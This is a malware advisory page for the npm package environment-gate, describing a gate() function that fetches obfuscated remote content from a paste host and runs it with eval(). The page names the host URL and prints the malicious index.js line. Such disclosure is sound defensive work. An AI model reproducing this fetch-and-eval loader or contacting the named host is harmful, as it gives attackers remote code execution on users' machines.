environment-gate @7.3.6
Vulnerability report · Last retrieved from osv.dev June 23, 2026 at 3:29 AM UTC
OSV ID
MAL-2026-5743
Ecosystem
npm
Summary
The package's only export, gate(), performs an HTTP GET to a base64-obfuscated URL (https://www.jsonkeeper.com/b/VKUNI) and passes the response body directly to eval(). The destination is an anonymous, mutable JSON paste host whose contents the author can change at any moment, so any caller of the documented gate() API executes arbitrary remote JavaScript in the installer's Node.js process — full remote code execution. The base64 wrapping of the URL and the cover-story description ('utility to await multiple asynchronous calls') with no repo, empty author field, and a single-file payload are consistent with a throwaway malicious package. index.js line 2: require('axios').get(atob('...')).then(r => {eval(r.data.content)}).
Source: amazon-inspector (48e4ad756dbae70bb38049d363961eb27239c7cf18c6a92612579aeb818da7b1)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.